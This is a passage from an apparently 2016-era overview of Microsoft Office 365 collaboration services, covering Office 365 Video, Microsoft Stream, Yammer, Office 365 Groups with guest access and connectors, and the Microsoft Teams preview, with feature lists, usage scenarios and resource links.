| IE 11 | Windows 10 | HTML5 |
| IE 11 | Windows 8.1 | HTML5 |
| IE 11 | Windows 7 | Adobe Flash |
| IE 9 - 10 | Windows | Adobe Flash |
| Chrome (latest) | Windows 7+ / OSX (latest) | HTML5 |
| Firefox (latest) | Windows 7+ / OSX (latest) | HTML5 |
| Safari (latest) | OSX (latest) | Native HTML5 |

**Mobile**

| Browser | OS | Playback Supported |
|---------|-----|-------------------|
| IE 11 | Windows Phone 8.1 | HTML5 |
| Chrome | Android 4.4.4 | HTML5 |
| Safari | iOS 6 | Native HTML5 |

## Microsoft Stream and Office 365 Video

In July 2016, Microsoft announced the preview of Microsoft Stream, a new business video service that makes it easier to access and discover video content inside your organization. Microsoft Stream builds upon the learnings and success of Office 365 Video, and over time the two experiences will converge, making Stream the de facto video experience in Office 365.

**There is no change for customers using Office 365 Video during the Microsoft Stream preview.** Microsoft Stream is currently in Preview but Office 365 Video is a Generally Available (GA) product.

For the immediate term, nothing changes with O365 Video. Microsoft Stream and Office 365 Video are two distinct services at this time

- If you have O365 E/A/G license use O365 Video.
- If you don't have O365 E/A/G license, now you can use Microsoft Stream Preview.

Over time, Microsoft Stream and Office 365 Video will converge into a single solution.

## Scenarios

- On-demand Trainings
- Corporate Messages
- Community knowledge sharing
- Help & How to

## Resources

**Watch Videos** ...

- Introducing Office 365 Video
- What's New: Office 365 Video
- Overview of Office 365 Video and how to use it
- What happens to a video file when you upload it into Office 365 Video?
- Office 365 Video - Embed Video Throughout Your Intranet

**Read** ...

- Meet Office 365 Video
- What's new—Office 365 Video
- Embed video throughout your intranet
- Create and manage a channel in Office 365 Video
- Manage your Office 365 Video portal
- Video formats that work in Office 365 Video
- Embed a video from Office 365 Video
- Add subtitles or captions to a video in Office 365 Video
- View statistics for a video in Office 365 Video
- Video REST API reference
- Office 365 Video networking Frequently Asked Questions (FAQ)

## Yammer

Companies looking to become more agile and customer-focused need to move beyond traditional centralized models to a more interconnected, flexible way of working.

**Yammer offers a smarter, faster way to connect and collaborate across a company.** Yammer's open, flexible workspaces are ideal for cross-company collaboration. With Yammer, individuals and teams at a company can:

- Share and collaborate with the right people inside and outside the organization
- Tap into knowledge across an organization
- Connect and engage everyone
- Work seamlessly with Office

By creating a dynamic network of people and knowledge across a company, Yammer enables employees to respond faster, accomplish more, and keep the business moving together.

## Features

- **Groups**: From departmental communications to your next campaign launch or company event, set up a Group in seconds for any team, project or interest.
- **Related Groups**: You can add and prioritize groups related to the ones you've already joined so coworkers can discover even more relevant people, content, and conversations.
- **Announcements**: Share an announcement with a group to instantly notify members of important updates. Administrators can pin Announcements to a group for easy discovery
- **User Profiles**: Upload a picture, fill in contact details and list your expertise. Profiles aggregate all your information, including conversations and files.

- **Expertise**: Reach across the company to find the experts you need. Because Expertise is instantly searchable, useful information can be found on demand.
- **Praise**: Give and receive recognition for a job well done. Accomplishments and badges appear on profiles in the Praise tab.
- **Publisher**: Use the publisher to share an update, add a document, post a poll, or praise someone.
- **@Mention**: Notify other coworkers and loop them into a conversation by @mentioning their name.
- **Private Messages**: Start a private dialogue with one or more coworkers. You can add more participants at any time.
- **Share Conversations**: Share conversations to another group's feed or via a private message to relay information and important messages.
- **Office Online support**: With Office Online support in Yammer, documents uploaded to Yammer can be viewed/edited with Office Online.
- **Polls**: Easily create a poll to survey coworkers and gather feedback from others to inform your decision-making
- **Files**: Share Microsoft Office documents, PDFs, images and videos across teams and get feedback right away.
- **Notes**: Draft content, collect notes and create wikis with your team members right inside Yammer and see character-by-character changes in real time.
- **Email a File**: Easily and securely email documents directly from your team workspace. Provide access to a file or Note with a secure, one-time URL and revoke viewing rights at any time.
- **Official Content**: Mark files and Notes as official and read-only. Official Content appears higher in search results and content directories for easy access
- **Inbox**: Inbox automatically aggregates your @mentions, group announcements, conversations and private messages so you can easily prioritize responses.
- **Feeds**: Stay on top of relevant conversations, files and projects happening across the company. Feeds let you quickly engage in conversations, @mention coworkers to loop them into a discussion and preview documents.
- **Recent Activity**: Discover what your coworkers are working on as it happens. Ticker shows you activity stories happening in real time, including page edits, file uploads and updates made in other business applications.
- **Topics**: Tag content with topics to help others quickly find related messages, files, Notes and more by adding a hashtag (#) before the word or by searching for existing topics.
- **Universal Search**: Full-text search lets you quickly find files, Notes, conversations, people and data across your Yammer network and integrated business apps.
- **External Networks**: Create a dedicated online workspace to collaborate with business contacts outside of your company's Yammer network.
- **Fast Network Switching**: Seamlessly switch between internal and external networks. Easily monitor conversations within external networks and immediately share insights with your company's internal network
- **Embeddable Feeds**: simple code snippet lets you easily embed any Yammer feed into your business application.

- **Like and Follow Buttons**: Add Like and Follow buttons to your business applications so employees can engage with objects outside of Yammer.
- **Data Export**: Manage and export network data according to company policies with a single click. You can also schedule daily or weekly data exports to meet legal and regulatory compliance requirements.
- **Keyword Monitoring**: Monitor keywords to track sensitive content. When a user posts a message that includes a monitored keyword or phrase, all Verified Admins are notified.
- **Analytics**: Gain insights from network analytics to find out how employees are using Yammer. From usage metrics to member statistics, identify ways to drive growth and increase the value of your network.
- **Usage Policy**: Set a custom usage policy for your company's network and require users to accept it.

For a more comprehensive information, refer to the Yammer Service Description online.

## New and upcoming updates

### Standards Compliance

As part of the Office 365 Trust Center, Yammer complies with international and regional standards such as the Office 365 Data Processing Agreement with European Union Model Clauses (DPA with EUMC), Health Insurance Portability and Accountability Office 365 Business Associate Agreement (HIPAA BAA), ISO 27001, ISO 27018, Section 508 for web accessibility, and SSAE 16 SOC 1 and SOC 2 reports.

### Yammer External Groups

The new **external groups** feature in Yammer enables you to include people outside your company in a Yammer group—making it easier for extended teams to work together. The external groups capability builds on the existing ways to work with people outside your company, such as external networks and external messaging, which enables you to add people outside your organization directly to a thread in your organization's Yammer network.



External groups allow team members with appropriate permissions from outside your organization to fully participate

in projects and initiatives by providing access to all the conversations and content in the group.



At the same time, we maintain the security of your network data by listing all external groups in a distinct section under the Groups menu and using clear indicators in the UI alerting users to the presence of external team members.

Refer to Introducing Yammer external groups post for more details and learn more about how to create and manage external groups in Yammer.

## Intune MAM Support



Yammer apps for iOS and Android were updated to allow IT administrators to protect their corporate data using mobile application management (MAM) controls in Microsoft Intune. Refer to blog post - Yammer App with Intune MAM – now available! for more details.

## Integration with Office 365 Audit Log

Over the coming weeks, you will be able to view Yammer events on users, groups, files, admins and network settings through the Office 365 Management Activity API and in the Office 365 Security & Compliance center. This will give you the ability to access and monitor various security and compliance-relevant Yammer events for your organization. The operations that you can search include the following categories:

- **Users**—including activating, suspending, and deleting a user.
- **Groups**—including creating, adding a member and deleting a group.
- **Files**—including creating, viewing, and deleting a file.

- **Admins**—including exporting data, triggering private content mode and forcing all users to log out.
- **Network settings**—including changing network usage policy and changing data retention policy.

Refer to Yammer bolsters security and compliance with new auditing and reporting capabilities and Yammer Events are included in the Office 365 Audit log and Management Activity API for more details.

## Integration with Office 365 Groups

Yammer is integrating with Office 365 Groups, bringing together the power of open collaboration with the productivity tools millions rely on every day. With this integration, Yammer users can easily turn ideas into action with access to SharePoint sites and document repositories, a shared OneNote notebook, and lightweight task management with Planner. These new experiences and more will be **rolling out in phases over the coming months**.



Yammer is now connected to the Office 365 Groups service, so all group properties, including name, description, profile picture, membership and public/private setting, are available in both Yammer and Azure AD, where Office 365 groups are stored. Admins can also centrally manage groups in the Office 365 admin center and apply PowerShell scripts to them to **simplify bulk updates**.



Uses can quickly share files in Yammer by uploading documents from a personal OneDrive, OneDrive for Business or SharePoint site using **the new Yammer file picker**.

Additionally, teams working within Yammer can now take advantage of a SharePoint document library, making it easy to manage files, apply workflow, review version history and comply with document retention policies. Each team also gets a

SharePoint site, which gives members the ability to create structured content like wikis and blogs.

> To avoid fragmenting team conversations, Office 365 Groups will provide either conversations in Yammer or conversations in Outlook. Office 365 Groups created in Yammer will have conversations in Yammer. Office 365 Groups created elsewhere in the suite will have conversations in Outlook.

Refer to blog posts – Now you can create and share Office documents while collaborating in Yammer and Yammer strengthens team collaboration through integration with Office 365 Groups for more details.

## Scenarios

### How organizations use Yammer

Here are some of the ways that organizations benefit from Yammer.

- **Centralize teams and projects.** Simplify collaboration by providing teams and projects flexible workspaces that allow them to communicate, share files, and find resources in one place.
- **Promote knowledge sharing**. Improve decision-making and reduce duplicate work by using Yammer to tap into knowledge across the organization and build on the work of others.
- **Foster innovation**. Foster innovation by connecting employees, ideas, and information without regard for time zones, geographies, or hierarchies
- **Support remote/mobile workers.** Identify and resolve problems with the customer experience by giving employees on the front line an efficient way to communicate with headquarters and supporting teams.
- **Improve internal communications.** Improve the effectiveness of the corporate communications strategy by connecting employees to executives, groups, and feedback.
- **Expand external collaboration.** Extend collaboration to customers, partners, and vendors by sending them a Yammer message, inviting them into a Yammer group, or setting up an external network.
- **Empower sales.** Yammer can maximize your sales team's effectiveness with better account insight, instant access to experts, and enhanced information when on the road.
- **Enhance HR practices**. Reduce cost and initial training cycles for new employees by creating a designated group with the onboarding resources they need, while giving them access to subject matter experts across the organization.
- **Extend the reach of IT.** Speed end-user adoption by sharing tips and tricks for new products. Enable self-help, access to peer expertise, and a searchable knowledge base to reduce total time to problem resolution.

### Transform Your HR Organization

An engaged workforce means good things for your company's HR and Corporate Communications Organizations. With Yammer, employees feel empowered to make a difference by contributing to recruiting efforts, recognizing peer performance, and learning from experts throughout the company or industry. Yammer increases employee engagement by giving every team member a voice and the tools and information to do more.

- **Onboard new hires quickly**. Enable new hires to ramp up faster and continue to develop their skills over time as they learn from their peers.
- **Recognize top talent**. Identify high performers and publicly recognize employees who do great work - increasing engagement, satisfaction, and retention.
- **Gain insight into performance**. Keep up to date with what your team is working on and the progress made.
- **Start a company dialogue**. Connect with your coworkers and encourage two-way dialogues in order to improve communication among teams, employees, managers, and executives.
- **Give employees a voice**. Spark creativity and innovation by allowing all employees to share ideas, offer feedback and help drive business results.

### Transform Your Marketing Organization

Collaboration across teams and with customers is critical to your organization's marketing success. With Yammer, you can engage with agencies to build high-impact campaigns across geographies, share customer insights, and drive refined go-to market strategies. You can also improve execution through real-time collaboration of collateral. Empower your employees to become brand ambassadors and strengthen your competitive position with Yammer.

- **Centralize information.** Create one workspace where designated teams can sync up and get projects done.
- **Accelerate collateral development.** Develop quality collateral much faster and in real-time with colleagues, ensuring that the salesforce is always equipped with the latest materials.
- **Collaborate securely with agencies.** Share information and gather feedback easily with internal and external agencies through external private networks.
- **Plan and execute events.** Drive awareness of activities and promote interaction among attendees pre-, during-, and post-event.
- **Create brand ambassadors.** Easily ensure employees and partners are aligned with company messaging and positioning.

### Empower Your Sales Organization

Finding the right information at the right time is critical to the success of your sales team. With Yammer, sales representatives can tap into the collective knowledge of your organization to close deals quickly and increase customer retention. Empower your teams to instantly access expertise and information, gain a competitive advantage, and secure deals faster.

- **Access and share key information**. Quickly distribute the latest key messaging out to the entire field.

- **Connect mobile workers**. Give your mobile and remote sellers access to key information in a timely manner with the Yammer mobile app.
- **Beat the competition**. Share in real-time what is and isn't working in the field, giving your team a competitive advantage.

## Resources

**Watch Video**

- 6 steps to a successful Yammer network - Check out this video to learn about Yammer rollout strategies and driving Yammer usage in your organization.

**Microsoft Virtual Academy Courses** ...

- Microsoft Yammer Essentials
- Yammer Administration and Power User Best Practices

**Read** ...

- Yammer Service Description
- Learning Path: Work like a network with Yammer. Training Material
- Yammer on the go

**For Yammer administrators** ...

- Yammer admin guide
- Yammer security FAQ (Yammer admin guide)
- Manage Yammer users across their life cycle from Office 365
- Enforce Office 365 identity for Yammer users
- Manage Yammer user licenses in Office 365
- Plan for Yammer SSO and DSync deprecation
- Monitor private content in Yammer (verified admins)
- Network migration: Consolidate multiple Yammer networks

## Office 365 Groups

Office 365 Groups is a service that enables teams to come together and get work done by establishing a single team identity (managed in Azure Active Directory) and a single set of permissions across Office 365 apps including Outlook, OneDrive for Business, OneNote, Skype for Business, Power BI and Dynamics CRM etc. When a user joins a group, they immediately gain access to all of the assets of the team, such as conversations, meetings and documents.



The Ignite session, Discover Office 365 Groups—overview, administration and roadmap, presents a comprehensive overview and update on Office 365 Groups. We first discussed how group collaboration in the enterprise has evolved to be multi-faceted and how Office 365 addresses the unique needs and workstyle of different groups.

A key benefit of Office 365 Groups is that any user in your organization can create a Group and start collaborating with others within minutes.



*Groups create an integrated experience for teams to focus on group activity.*

Groups can be public to enable information sharing within your company, or private for teams that deal with sensitive subjects.

## Features

**Conversations**

- In the Group inbox, all messages sent to the Group are displayed in a list view.
- Conversation details are displayed in the reading pane using a new conversation model
- Start a new conversation with Group members or reply inline to a conversation
- Send an email to a Group from your inbox, just like using a distribution list

**Files**

- File storage for Groups is accessed through a dedicated document library connected to the Group.
- Familiar OneDrive document management actions are available in the Group document library, such as document creation and upload.
- Provides some powerful scenarios involving co-authoring and attachment management

**Calendar Events**

- Helps you to track all your group events in one place, visible to everyone in the group.
- Visualize how group events will work into your schedule in Outlook Web App by overlaying your calendar with the group calendar.

- Any member of the group can create and update events, making it easy to keep the schedule up to date.
- For meetings scheduled on your personal calendar, you can add the group to the attendee list

**Navigation**

- The left navigation pane in Outlook Web App and Outlook makes it easy to navigate to any Group you have joined.
- Groups which you have marked as "favorites" are displayed first, ensuring that your key Groups are always just one click away
- The Group header makes it easy to switch between Group components, and provides easy access to Group management features such as favorites and subscription

**Group management**

- Groups support an open permission model, allowing you to add yourself as a member to any public Group, reducing management overhead and making it easy to access information.
- For sensitive topics, private Groups provide data privacy while offering a built-in mechanism for prospective members to request access to the Group.
- Group creation is available through Outlook Web App, just click the "+" button in the Groups area of the left navigation pane, to start creating your new Group

**Compliance and protection**

- **eDiscovery and Litigation Hold**—You can now perform an eDiscovery and Litigation Hold on a group's mailbox using Exchange Admin Center and on group files using the Office 365 Security & Compliance Center. Refer to: Security and compliance for Exchange Online
- **Auditing**—The Azure Management Portal now exposes group management events (creation, updates, membership changes, etc.) in the group audit report. Refer to: Azure Active Directory Audit Report Events.  Same events will appear in the Office 365 Security & Compliance Center alongside other Office 365 events you're used to tracking. This gives you a complete picture of the Groups changes in your tenant over time.

**Directory management**

- **Naming policies for Office 365 Group names *and* aliases** - Group naming policies allow users to self-organize, but enables control over the way that these groups appear in the corporate directory. The naming policy also applies to the email alias created for groups.
- **Dynamic membership** - Administrators can now create groups with rule-based memberships using the Azure Management Portal. Refer to: Using attributes to create advanced rules. Group membership is updated within a minute as users' properties change. This allows easy management of larger groups or the creation of groups that always reflect the organization's structure. Note, *enabling dynamic membership for groups requires Azure AD Premium licenses.*

## Guest Access in Office 365 Groups

Guest access in Office 365 Groups enables you and your team to collaborate with people from outside your organization by granting them access to group conversations, files, calendar invitations, and the group notebook. Access can be granted to a guest—including partners, vendors, suppliers, or consultants—by any group owner.

### How it works

Office 365 users can use Outlook on the web to add and manage guests in their Office 365 groups. Guests can have any email address, and the email account can be a work, personal, or school account.

- **Step 1**   A group owner adds a guest to the group or a guest is nominated by group members. The group owner approves the nominees.
- **Step 2**   The group owner is informed of what the guest can access within the group. A combination of text and icons give all group members clear indication of guest participation.
- **Step 3**   The guest receives a welcome email and can participate in group conversations, receive and respond to calendar invitations, and access the group files.
- **Step 4**   Guests can leave the group at any time via a link in the footer of all group emails and calendar invites.

Guest access is a tenant-level setting and is enabled by default. A tenant admin can manage the guests and their access to Office 365 group resources using PowerShell. See Allow external people guest access to Office 365 groups for instructions.

### The guest experience

When a guest is invited to join a group, they receive a welcome email that includes a little information about the group and what they can expect now that they're a member.



All of the guest member's interactions occur through their email inbox. They can't access the group site but can receive calendar invitations, participate in email conversations, and, if the tenant admin has enabled it, open shared files using a link or attachment.

All group emails and calendar invitations the guest receives will include a reminder to use "reply all" in responses to the group, along with links to **view group files** and **leave or unsubscribe from the group**.

## New and Upcoming Features

The following new capabilities are available:

- **Ability to update privacy type**. When you create an Office 365 group, users have two privacy options: public (anyone within your organization can access the group's content) and private (only approved members can access the group's content). This update enables group owners to change the privacy setting from public to private or vice versa by editing the group properties in Outlook on the web.
- **Multi-domain support**. Larger organizations use separate email domains to reflect different parts of their businesses. Office 365 groups that are created by users in one domain will share that domain (as opposed to using a common domain across the tenant). Administrators now also have control to create groups in specific domains of their choosing.
- **Guidance to configure Office 365 Groups with on-premises Exchange mailbox users**. If you've configured a hybrid deployment between your on-premises Exchange organization and Office 365, you can make groups created in Office 365 available to your on-premises users.
- **Allow users to send as the Office 365 group**. If you want to enable your group's shared mailbox to "Send As," you can now use the PowerShell cmdlets to configure this. Users can go to the group, create a new email and change the "Send As" field to the group's email address.
- **Creation policy in Azure Active Directory**. We've implemented policy in Azure Active Directory that allows administrators to restrict group creation to certain users. This ensures that the creation of Office 365 groups through all endpoints, such as Planner and Power BI, can be given to selected users. The existing Exchange Mailbox policy only applies to creation in Exchange.
- **Usage guidelines**. You'll be able to define usage guidelines for Office 365 Groups—to educate your users about best practices that help keep their groups effective and educate them on internal content policies.
- **Data classification and extensible policy**. You'll be able to create a customizable data classification system for Office 365 Groups that allows separation of groups by policy type (e.g., "unclassified," "corporate confidential" or "top secret"). In this manner, your groups can exhibit the policies of other content in your organization. Extensible policy allows your organization to configure an endpoint that is called whenever a group is created or changed—and you can then implement your own policies for group creation or change.
- **Mobile application management**. To protect users' data on the go, we're working on exposing the Outlook Groups mobile apps in Microsoft Intune as policy-managed apps.

Some of the key items on roadmap are:

- **Exchange Admin Center (EAC) UI for migrating Distribution Lists (DLs) to groups**. Building on the scripts we released (mentioned above) for DL migration, you will soon be able to migrate a DL to a group directly from the Exchange Admin Center with one click!

- **Naming policy in Azure Active Directory**. Administrators will be able to configure a policy for appending text to the beginning or end of a group's name and email address no matter where the group is created (e.g., Outlook, Planner, Power BI, etc.). Administrators can also configure a list of specific blocked words that can't be used in group names and also rely on the native list of thousands of blocked words to keep their directories clean.
- **Ability to search for private Groups files**. By integrating Groups files (stored in a SharePoint document library and surfaced in OneDrive for Business) and Office Delve users will be able to search content from both public and private groups as long as they're a member

## Evolving Distribution Lists with Groups

Distribution Lists (DL) are the leading way users share information with a set of people today. Office 365 Groups provide a way to improve that experience.

**Groups increase productivity** –  Enabling a richer and immersive experience, yet familiar in integrating with email & existing business workflows

- Appear alongside your Inbox & require no context switching. Make them favorites and access them offline.
- Addressable in emails just like DL's but provide a better down-level experience.
- Allows you to focus & immerse on a topic or project. Modern Reading experience helps you communicate @speed of social.

**Groups allow you to self-organize**, create dynamic teams & work as a network. Benefit from the collective wisdom of your team.

- Get access to complete history and context.
- Find & discover new groups & joining them easily.
- Form and create groups instantly and to work with your teams.

**Groups enable frictionless collaboration** & sharing by integrating with O365. Empowers teams to accomplish goals and milestones!

- Enable frictionless collaboration by accessing and sharing files from any conversation.  View all group files at a glance.
- Meet milestone and goals by scheduling meetings on team calendar.
- Make better & faster decisions with your team via Skype meetings.
- Access them from anywhere, across all devices and Outlook experiences

### Migrating Distribution Lists to Office 365 Groups

The article - Migrate distribution lists to Office 365 Groups - Admin help explains how to use scripts to migrate multiple distribution lists (sometimes referred to as distribution groups) to Office 365 groups. If you want your organization's distribution lists to get all the features and functionality of Office

365 groups, you can now migrate your distribution lists using PowerShell.

## Office 365 Connectors for Groups

Office 365 Connectors are a great way to get useful information and content into your Office 365 Group. Any user can connect their group to services like Trello, Bing News, Twitter, etc., and get notified of the group's activity in that service. From tracking a team's progress in Trello, to following important hashtags in Twitter, Office 365 Connectors make it easier for an Office 365 group to stay in sync and get more done.





### How connectors work

When you connect a tool or service to a group, everyone in the group can see the messages delivered by that service. For example, let's say your group wants to follow news reports about your company's new product that's hitting the market. You could add the Bing News connector to your group, configure it to send you links to topics of interest, and specify the frequency of delivery. When news headlines are sent to your group, everyone in the group will be able to read and respond to them.

The messages are delivered as rich connector cards, which can be viewed in multiple clients including Outlook on the web, Outlook for Windows, and in the Groups app for iOS and Android. Here's an example of what the UserVoice connector card would look like:



**Available Connectors**

50+ Office 365 Connectors are available today, spanning popular applications across productivity, news sources, HR systems, sales, project management, marketing automation, entertainment, eLearning, developer tools and many more.

## Scenarios

- In a manufacturing company, a product planning team is chartered to come up with a new idea for night lights. They want to quickly exchange thoughts and co-author a few documents to deliver a proposal, a presentation, a budget, and a collection of discussion notes.
- A company wants to coordinate logistics and expertise from its employees for a customer marketing and promotion event.
- A close-knit executive team needs to plan and schedule a big product announcement, but securely, so as not to risk an untimely disclosure.
- A large company wants to organize a Football league, set up a game schedule on a group calendar, and share common content such as team rosters, equipment inventories, and even a statistical spreadsheet.

## Resources

**Watch Videos** ...

- Introducing Office 365 Groups
- Office 365 Groups: Quick tour of new user and admin experiences
- Introducing Office 365 Connectors

**Read** ...

- Office Training Center - Unite your team with Groups
- Find help about groups in Office 365
- Compare Outlook Groups on all platforms
- Connect apps to your groups
- Office 365 Connectors for Groups (Developer Preview)
- Get started with Office 365 Connector Cards

**For Admins** ...

- View, create, and delete Groups in the Office 365 admin center
- Manage Group membership in the Office 365 admin center
- Guest access in Office 365 Groups
- Migrate distribution lists to Office 365 Groups - Admin help
- Office 365 Groups now supports eDiscovery, litigation hold, dynamic membership and more!

- [Multi-domain support for Office 365 Groups](#)
- [Configure Office 365 Groups with on-premises Exchange hybrid](#)
- [Use PowerShell to manage Office 365 Groups](#)

**Key Ignite session**s ...

- [Help your users collaborate better with Office 365 Groups](#)
- [Learn about Office 365 Groups and how to use them](#)
- [Use Office 365 Groups at schools and universities](#)
- [Learn what to use when: Office 365 Groups, SharePoint Team Sites, Yammer and OneDrive for Business](#)
- [Communicate on your terms with Outlook, Yammer and Skype](#)
- [Explore the ultimate field guide to Microsoft Office 365 Groups](#)
- [Collaborate outside the firewall with Office 365 Groups](#)
- [Migrate DL to Microsoft Office 365 Groups](#)
- [Ask us anything about Microsoft Office 365 Groups](#)
- [Work smarter with Yammer and Office 365 Groups](#)
- [Meet Planner—the new Microsoft Office 365 work management application](#)
- [Discover what's new and what's coming to the SharePoint Mobile and Intelligent Intranet](#)
- [Connect your business-critical applications to Outlook and Groups](#)

## Microsoft Teams *(Preview)*

**Microsoft Teams** is a chat-centered workspace in Office 365 that's a hub for teamwork. It's extensible and customizable, so you can tailor it for the information your team needs. Microsoft Teams supports flexible communication, including chats, calls, meetings, and private and group conversations.

**Core Values**

Microsoft Teams is designed for highly engaged teams that work closely together to get things done:

- Share updates and give feedback in the open
- Make quick decisions and stay in the loop with team activities
- Coordinate on projects and tasks, including co-create content and deliverables

> **Note**: Microsoft Teams is available in preview to eligible Office 365 commercial customers. **We expect the service to become generally available in Q1 CY2017**.

## Key Differentiators

Being part of Office 365 means Microsoft Teams comes with **built-in integrations to Azure Active Directory, SharePoint, OneNote, Office 365 Groups and more**. This allows you to maximize your Office 365 investments, while providing a simple and secure user experience across tools.

## Chat for today's teams

First and foremost, Microsoft Teams provides a modern conversation experience for today's teams. Microsoft Teams supports not only persistent but also threaded chats to keep everyone engaged. Team conversations are, by default, visible to the entire team, but there is of course the ability for private discussions. Skype is deeply integrated, so teams can participate in voice and video conferences. And everyone can add personality to their digital workspace with emojis, stickers, GIFs and custom memes to make it their own.

## Hub for teamwork

Second, Microsoft Teams brings together the full breadth and depth of Office 365 to provide a true hub for teamwork. Word, Excel, PowerPoint, SharePoint, OneNote, Planner, Power BI and Delve are all built into Microsoft Teams so people have all the information and tools they need at their fingertips. Backed by the Microsoft Graph, intelligent services are surfaced throughout the workspace to help with information relevancy, discovery and sharing. Microsoft Teams is also built on Office 365 Groups—our cross-application membership service that makes it easy for people to move naturally from one collaboration tool to another, preserve their sense of context and share with others.

## Customizable for each team

Third, since all teams are unique, we've invested deeply in ways for people to customize their workspace, with rich extensibility and open APIs available at general availability. For example, Tabs provide quick access to frequently used documents and cloud services. Microsoft Teams also shares the same Connector model as Exchange, providing notifications and updates from third-party services like Twitter or GitHub. Further, we are including full support for the **Microsoft Bot Framework** to bring intelligent first- and third-party services into your team environment.

## Security teams trust

Finally, Microsoft Teams provides the advanced security and compliance capabilities that our Office 365 customers expect. Data is encrypted in transit and at rest. Like all our commercial services, we have a transparent operational model with no standing access to customer data. Microsoft Teams will support key compliance standards including EU Model Clauses, ISO 27001, SOC 2, HIPAA and more. And, as customers would expect, Microsoft Teams is served out of our hyper-scale global network of data centers, automatically provisioned within Office 365 and managed centrally, just as any other Office 365 service.

## Definitions

## Organization

All teams created by employees in your organization are associated with your Office 365 tenant. You can designate all employees or a subset of employees with the ability to create teams, using Office 365 Groups.

## Team

A team is designed to bring together a group of people that work closely to get things done. Teams can be dynamic for project-based work (e.g. launching a product, creating a digital war room), as well as ongoing, to reflect the internal structure of your organization (e.g. departments and office locations). Conversations, files and notes across team channels are only visible to members of the team.

## Channel

A channel helps organize the team's conversations, content and tools around a specific topic. Channels can be organized, for example, by topic (events), discipline (design), project (launch) or just for fun (fun stuff). Team owners can create channels, and enable team members with the ability to create channels, as needed. Tabs along the top of a channel enable teams to keep files, notes, and customized content such as Power BI metrics, business goals on a Word doc or organizational chart on a PowerPoint slide.  This content is then easily accessible to everyone on the team. Additional connectors to 3rd party applications can be customized at the channel level to bring in data from everyday tools such as Trello, Asana, GitHub and more.

## Team Membership

When Microsoft Teams is activated for your entire organization, designated team owners are able to invite any employee they work with to join their team. Microsoft Teams makes it easy for team owners to add people in the organization based on their name.

Team owners can also create a team based on an existing Office 365 Group. Any changes made to the group will be synched with Microsoft Teams automatically. Creating a team based on an existing Office 365 Group not only simplifies the process of inviting and managing members, but also syncs group files inside of Microsoft Teams.

## Team Roles

There are two main roles in Microsoft Teams: a **team owner**, the person who creates the team, and **team members**, the people who they invite to join their team. Team owners can make any member of their team a co-owner when they invite them to the team or at any point after they've joined the team. Having multiple team owners enables you to share the responsibilities of managing settings and membership, including invitations.

## Team Settings

Team owners can manage team-wide settings directly in Microsoft Teams. Settings include the ability to add a team picture, set permissions across team members for creating channels, adding tabs and connectors, @mentioning the entire team or channel, and the usage of GIFs, stickers and memes.

As a Microsoft Teams admin, you have access to system-wide settings in the admin center. These settings can impact the options and defaults team owners see under team settings. For example, you can enable a default channel, "General", for team-wide announcements, discussions and resources, which will appear across all teams.

## Features

## Teams and Channels

- Teams are collections of people, content, and tools surrounding different projects and jobs within an organization. Team members can share conversations, files, notes, and more!
- Keep team conversations organized in specific channels. You can dedicate channels to specific topics, projects, disciplines—whatever you like!

**Creating Teams**

- Click on Create a Team below the Team list to create a team
- Some organizations might decide to only let certain people create teams
- A team owner can add people to the team by clicking on Add members option
- Let people know that you created team. In the General channel, you can @mention the team by typing @team or @[team name] in the compose box.

**Channels**

- Create a new Channel by clicking on Add a Channel option in the team list
- Let people know you created a channel. In the compose box of your brand new channel, you can mention people's names (@somebody) to get their attention
- See all the Channels in the team by selecting the Channels tab

**Managing Teams**

- Team owner can change team settings by clicking View Team option and going to Setting tab
- Team owner can change the team picture in team settings
- Leave a team at any time by clicking ... next to the team name and selecting Leave the team option

**Uploading Files**

- To upload a file to a channel, click the Files tab at the top, then click Upload a file. When you upload a file, everyone on the team can see and edit it from the Files tab.
- You can also upload a file by sending a message with a file attachment to a channel. This will add the file to the channel's Files tab and share it with everyone on the channel.

**Ownership**

- Team owners can change the name of team channels anytime they like using the Edit this channel option
- Team owners can delete a Team using Delete the team option. Your team will be permanently

Other Admin Settings for Team owners....

- Set team members' permissions for channels, tabs, and connectors.

- Control @[team name] mentions that will notify everyone on the team.
- Allow @channel or @[channel name] mentions, which will notify members who've favorited the channel.
- Allow usage of Giphy, stickers, and memes

## Meetings and Calling

**Team Meetings**

- Team meetings are a quick and easy way for people in a channel to go from a conversation to an impromptu meeting.
- Anyone from the team can join, so people work in the open.
- Team meetings include audio, video, and sharing
- Start a new meeting, by clicking the meeting icon in a new conversation
- Keep the context of the conversation and bring in the people you're already talking to by clicking the meeting icon in an existing conversation
- Desktop sharing lets you see what someone is presenting and is an easy way to work together on a shared document

**Scheduling Team Meeting**

- Clicking on the Schedule icon on the left side of the app will show you list of all your currently schedule meetings
- Click "Schedule Meeting" to schedule a new meeting

**Joining a Team Meeting**

There are three ways to join meetings in Microsoft Teams:

- You can join from a message within a conversation
- If you're working in another channel and your messages aren't currently in view, you can join a meeting from a notification that will appear in the top right corner of your screen.
- You'll receive a notification that you've been invited to a meeting, and you can join from there

**Multitasking in a Meeting**

- Multitasking during a meeting is easy - you can check on what's going on in other channels or catch up on your messages.
- Whenever you click away from a meeting, a call monitor will appear. From there, you can click back in an instant

## Managing My Space

**Availability**

- Change your status by clicking on your picture or avatar, and update

**Personalizing**

- Reorder your teams by clicking and dragging the team name anywhere in your team list.
- Channels follow the alphabet, and there's no reordering the alphabet
- To change your profile image, just click on your avatar on the left-hand side of your screen, then click **Change picture**.
- All the channels you've already favorited will be listed underneath the team they belong to in your Teams view.

- To favorite a new channel, click on the overflow menu that appears under your current favorites for each team. Scroll down to the channel you want to favorite. Click on favorite icon next to the channel name.

## Keeping up with information updates

There are lots of things you can do to stay up-to-date. You can:

- **Arrange** your teams in an order that makes sense to you, putting the busiest teams at the top of your list.
- **Favorite** the channels you use the most. This way, they'll stay visible in your team list, and you'll see when new messages have been posted.
- **@mention** people so they @mention you. You'll see you've been @mentioned in your notifications. Also, a red circle with a number in it will appear next to the channel name.
- And watch the **Activity** button. That lets you know whenever you've got notifications.

## Connectors

- You can set up a connector, which lets you get real-time updates from your external apps and services sent directly to a channel. Some examples are Twitter, Bing News, Trello, and GitHub.
- We have connectors that let you integrate apps and services right into the conversation.
- To add connectors, click on the channel name, click ... , and then click Connectors
- We support incoming webhooks, which can be set up by creating a connector. They allow you to build custom integrations with other apps and services.
- You can see connector messages in the mobile app, but you can only add them in the desktop or web app
- Team owner can disable the setting that allows non-owners to add connectors.

## Files

- To share files with a team, go to the Files tab at the top of a conversation, and click Upload. You can also attach a file directly to a message and it will still appear in your Files tab
- The easiest way to send a file in a direct message or channel is to click paperclip icon in the compose box
